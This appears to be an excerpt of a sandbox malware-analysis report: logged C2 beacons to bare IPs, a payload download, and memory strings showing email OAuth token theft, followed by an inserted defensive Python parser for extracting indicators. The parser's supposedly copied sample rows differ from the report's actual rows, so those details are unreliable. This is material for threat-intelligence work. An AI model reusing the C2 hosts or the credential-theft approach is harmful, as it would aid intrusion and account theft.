                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe | Code function: 1_2_10001183 (__EH_prolog3_GS, InternetSetFilePointer, InternetReadFile, HttpQueryInfoA, CoCreateInstance)
                    Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f926d19fe6595cd66946851e91fcd85241ab258d81029326be8ee43a8f51f8a95b5c0212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d43488d3d09d594bc9 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 185.39.17.76
                    Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c926d19fe6595cd66946851e91fcd85241ab258d81029326be8ee43a8f51f8a95b5c0212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d43488d3d09d594bc9 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 185.39.17.76
                    Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38d926d19fe6595cd66946851e91fcd85241ab258d81029326be8ee43a8f51f8a95b5c0212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d43488d3d09d594bc9 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 185.39.17.76
                    Source: global traffic | HTTP traffic detected: GET /PA.bin HTTP/1.1 | Connection: Keep-Alive | Host: h1.passionwhenever.shop
                    Source: global traffic | HTTP traffic detected: GET /success?substr=two&s=uniq&sub=none HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: 1 | Host: 185.156.73.98 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: GET /info HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: 1 | Host: 185.156.73.98 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: GET /update HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: 1 | Host: 185.156.73.98 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: GET /service HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: U | Host: 185.156.73.98 | Connection: Keep-Alive | Cache-Control: no-cache (this request is listed four times in the report)
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: denied12157https://www.googleapis.com/oauth2/v4/tokenhttps://login.microsoftonline.com/common/oauth2/v2.0/tokenhttps://api.login.yahoo.com/oauth2/get_tokenhttps://api.login.aol.com/oauth2/get_tokenrefresh_token=&client_id=&client_secret=&scope=https%3A%2F%2Foutlook.office.com%2FIMAP.AccessAsUser.All%20https%3A%2F%2Foutlook.office.com%2FPOP.AccessAsUser.All%20https%3A%2F%2Foutlook.office.com%2FSMTP.Send%20offline_access&scope=https%3A%2F%2Foutlook.office.com%2FIMAP.AccessAsUser.All%20https%3A%2F%2Foutlook.office.com%2FSMTP.Send%20offline_access&grant_type=refresh_token&grant_type=authorization_code%s | %saccess_tokenrefresh_tokenexpires_inerrorerror_descriptionSuccess; expire: %dError: [%d] [%s] [%s] [%s]":}imap.googlemail.comgmail.comgooglemail.compop.gmail.compop.googlemail.comhotmail.comoutlook.comlive.commsn.comoutlook.office365.comyahoo.comimap.mail.yahoo.compop.mail.yahoo.comimap.aol.comimap.aim.compop.aol.compop.aim.comstate=%Y%m%d%H%S%u%ustateesumsoft.poppeeper\shell\open\commandPpHelper.exePpHelper.exe could not be found and is required to perform this action829 "PpHelper.exe could not update the necessary data equals www.yahoo.com (Yahoo)
                    Source: global traffic | DNS traffic detected: DNS query: proenhann.digital
                    Source: global traffic | DNS traffic detected: DNS query: h1.passionwhenever.shop
                    Source: global traffic | DNS traffic detected: DNS query: microsoft-com.mail.protection.outlook.com
                    Source: global traffic | DNS traffic detected: DNS query: quag.cn
                    Source: global traffic | DNS traffic detected: DNS query: yahoo.com
                    Source: global traffic | DNS traffic detected: DNS query: mta5.am0.yahoodns.net
                    Source: unknown | HTTP traffic detected: POST /thnb HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 47 | Host: proenhann.digital
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Tue, 15 Apr 2025 15:03:48 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | X-Frame-Options: SAMEORIGIN | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iWYX4948avOaBj6I9f6Gj%2F%2ByktnNAJ3ADRiCygz03ZBW1OXM%2BCz%2FU9J8yhkYoCm3TmBtsOvDrCRdqfBsCNbIsY1HaC7fOB8tBGzdGH6JX2nNvSkWuOy1TCvJWnUZZIObb0WpZJy%2F5%2BRT9Q%3D%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | speculation-rules: "/cdn-cgi/speculation" | Server: cloudflare | CF-RAY: 930c54f19c6f3789-MIA
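A worked example added by the editor (not code from the report or from Joe Sandbox) that turns the network rows above into something a responder can act on. It splits the request lines back into headers (the extraction ran them together; rows separated by " | " parse the same way), collects hosts, URI paths, DNS names and direct-to-IP peers, flags the request shapes visible in this section (a bare-IP Host header with no preceding DNS lookup, a User-Agent naming "Windows NT 9.0", a version that never shipped, the one-character User-Agents "1" and "U", a beacon-sized form-encoded POST, and a 64+ character hex key in the query string), and shows that the /ai/?key= values of equal length differ at a single hex position. The sample rows are copied from this section; the header list, thresholds and flag wording are the editor's assumptions, not Joe Sandbox signatures.

```python
"""Editor's added example, not part of the Joe Sandbox report or its tooling.
Parses the report's flattened network rows (headers run together, or separated
by ' | ') back into request lines and headers, extracts blockable indicators and
flags the request shapes seen above.  Header list and heuristics are assumptions."""
import re
from collections import defaultdict

# Header names that occur in this report, longest first so the alternation prefers
# "Accept-Language" over "Accept".  A generic "Name: " split would instead yield
# bogus names such as "Keep-AliveContent-Type" from the run-together text.
HEADER_NAMES = ["Accept-Language", "Accept-Charset", "Accept-Encoding", "Accept",
                "Cache-Control", "Connection", "Content-Length", "Content-Type",
                "User-Agent", "Host", "Date", "Transfer-Encoding", "X-Frame-Options",
                "Report-To", "NEL", "speculation-rules", "Server", "CF-RAY"]
_HDR_SPLIT = re.compile(r"(?=(?:%s): )" % "|".join(map(re.escape, HEADER_NAMES)))
_REQ_LINE = re.compile(r"^(GET|POST|HEAD|PUT) (\S+) HTTP/\d\.\d$")
_STATUS_LINE = re.compile(r"^HTTP/\d\.\d (\d{3}) (.*)$")
_HTTP_ROW = re.compile(r"HTTP traffic detected: (.*)$")
_DNS_ROW = re.compile(r"DNS traffic detected: DNS query: (\S+)$")
_TCP_ROW = re.compile(r"without corresponding DNS query: (\d{1,3}(?:\.\d{1,3}){3})")
_IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
_LONG_HEX = re.compile(r"[0-9a-f]{64,}")

# Constructed sample input: rows copied from this section in the run-together form
# the extraction produced (the 403 row has its Report-To/NEL headers trimmed).
SAMPLE_ROWS = [
    "Source: global trafficHTTP traffic detected: POST /thnb HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 85Host: proenhann.digital",
    "Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38a926d19fe6595cd66946851e91fcd85241ab258d81029326be8ee43a8f51f8a95b5c0212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d43488d3d09d594bc9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76",
    "Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38b926d19fe6595cd66946851e91fcd85241ab258d81029326be8ee43a8f51f8a95b5c0212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d43488d3d09d594bc9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76",
    "Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb388926d19fe6595cd66946851e91fcd85241ab258d81029326be8ee43a8f51f8a95b5c0212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d43488d3d09d594bc9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76",
    "Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f842a1cec7a86d87bdb6547ad12dac0290cfc40951e3c7877a5e650e2f01881cdbdcc3e638db75fc496e54cc9d39655a8b3e297545290db040887777014d23788d0d596544cca70 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76",
    "Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f852a1cec7a86d87bdb6547ad12dac0290cfc40951e3c7877a5e650e2f01881cdbdcc3e638db75fc496e54cc9d39655a8b3e297545290db040887777014d23788d0d596544cca70 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76",
    "Source: global trafficHTTP traffic detected: GET /success?substr=two&s=uniq&sub=none HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.98Connection: Keep-AliveCache-Control: no-cache",
    "Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 15 Apr 2025 15:03:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINServer: cloudflareCF-RAY: 930c54f19c6f3789-MIA",
    "Source: global trafficDNS traffic detected: DNS query: h1.passionwhenever.shop",
    "Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.98",
]


def parse_http_row(row):
    """One 'HTTP traffic detected' row -> dict(kind, method/uri or status, headers)."""
    m = _HTTP_ROW.search(row)
    if not m:
        return None
    first, *parts = [p.strip(" |") for p in _HDR_SPLIT.split(m.group(1))]
    rec = {"headers": dict(p.partition(": ")[::2] for p in parts)}
    if rl := _REQ_LINE.match(first):
        rec.update(kind="request", method=rl.group(1), uri=rl.group(2))
    elif sl := _STATUS_LINE.match(first):
        rec.update(kind="response", status=int(sl.group(1)), reason=sl.group(2))
    else:
        rec.update(kind="unknown", raw=first)
    return rec


def flag_request(rec):
    """Editor's heuristics for the request shapes visible in this section."""
    if not rec or rec["kind"] != "request":
        return []
    h, out = rec["headers"], []
    host, ua = h.get("Host", ""), h.get("User-Agent", "")
    if _IPV4.match(host):
        out.append("Host is a bare IPv4 literal, so no DNS lookup precedes the request")
    if "Windows NT 9.0" in ua:  # NT went from 6.3 (Windows 8.1) straight to 10.0
        out.append("User-Agent names a Windows NT version that never shipped")
    if len(ua) <= 2:
        out.append("User-Agent is a one-character placeholder")
    if _LONG_HEX.search(rec["uri"]):
        out.append("query string carries a hex blob of 64+ characters")
    if (rec["method"] == "POST" and h.get("Content-Type") == "application/x-www-form-urlencoded"
            and h.get("Content-Length", "x").isdigit() and int(h["Content-Length"]) < 128):
        out.append("beacon-sized form-encoded POST body")
    return out


def indicators(rows):
    """Hosts, URI paths, DNS names and direct-to-IP peers found in the rows."""
    out = {"hosts": set(), "paths": set(), "dns": set(), "direct_ips": set()}
    for row in rows:
        if d := _DNS_ROW.search(row):
            out["dns"].add(d.group(1))
        elif t := _TCP_ROW.search(row):
            out["direct_ips"].add(t.group(1))
        elif (rec := parse_http_row(row)) and rec["kind"] == "request":
            out["hosts"].add(rec["headers"].get("Host", ""))
            out["paths"].add(rec["uri"].partition("?")[0])
    return out


def varying_positions(keys):
    """Indices at which equal-length strings differ: a short list means the value is
    static apart from a small mutable field, and the static part is what to sign on."""
    keys = list(keys)
    if len({len(k) for k in keys}) != 1:
        raise ValueError("keys must have equal length")
    return [i for i in range(len(keys[0])) if len({k[i] for k in keys}) > 1]


def key_groups(rows):
    """Group the ?key= values by length and report where each group varies."""
    by_len = defaultdict(list)
    for row in rows:
        rec = parse_http_row(row)
        if rec and rec["kind"] == "request":
            query = rec["uri"].partition("?")[2]
            for name, _, value in (p.partition("=") for p in query.split("&")):
                if name == "key":
                    by_len[len(value)].append(value)
    return {n: varying_positions(ks) for n, ks in by_len.items() if len(ks) > 1}
```

For the rows embedded above, `key_groups(SAMPLE_ROWS)` returns `{176: [35], 178: [37]}`: the 176-character keys (the ones ending in `...594bc9`) differ only at index 35 and the 178-character keys (ending in `...544cca70`) only at index 37. The report does not say whether that character is a counter, a flag or an encoding artefact; the practical point is that a detection written on the static part of the key survives the variation, while one on the whole value matches a single request. `indicators()` is the list to hand to the blocking team: `proenhann.digital`, `h1.passionwhenever.shop`, the bare IPs `185.39.17.76` and `185.156.73.98`, and the paths `/thnb`, `/ai/`, `/success`.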
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://127.0.0.1:%d/
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://127.0.0.1:%d/https://mail.google.com/https://accounts.google.com/o/oauth2/v2/auth&login_hint=
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/2
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/fons
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005CC000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000001.00000002.1819615613.00000000005A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/info
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/ows
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005CC000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000001.00000002.1832671709.0000000002F5A000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000001.00000002.1819615613.00000000005A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/service
                    Source: svchost015.exe, 00000001.00000002.1832671709.0000000002F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/service=C:
                    Source: svchost015.exe, 00000001.00000002.1832671709.0000000002F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/serviceFil
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/serviceWo
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/servicedbM
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/servicehqos.dll.mui
                    Source: svchost015.exe, 00000001.00000002.1832671709.0000000002F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/serviceicr
                    Source: svchost015.exe, 00000001.00000002.1832671709.0000000002F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/servicell
                    Source: svchost015.exe, 00000001.00000002.1832671709.0000000002F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/serviceng(
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/servicengm
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/serviceoaming
                    Source: svchost015.exe, 00000001.00000002.1832671709.0000000002F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/servicerogo
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/success?substr=two&s=uniq&sub=none
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/update
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/updateswsock.dll.mui
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2038386691.00000000039FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2038386691.00000000039FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: powershell.exe, 00000013.00000002.2219622501.0000000008907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2038386691.00000000039FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2038386691.00000000039FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2038386691.00000000039FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2038386691.00000000039FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2038386691.00000000039FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                    Source: powershell.exe, 0000000B.00000002.1844484241.0000000005D4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1979002205.0000000005C89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2038386691.00000000039FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2038386691.00000000039FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0
                    Source: powershell.exe, 00000013.00000002.2127597678.000000000521E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 0000000B.00000002.1785737784.0000000004E36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1961124956.0000000004D3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2127597678.000000000521E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 0000000B.00000002.1785737784.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1961124956.0000000004C21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 0000000B.00000002.1785737784.0000000004E36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1961124956.0000000004D3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2127597678.000000000521E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000013.00000002.2127597678.000000000521E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
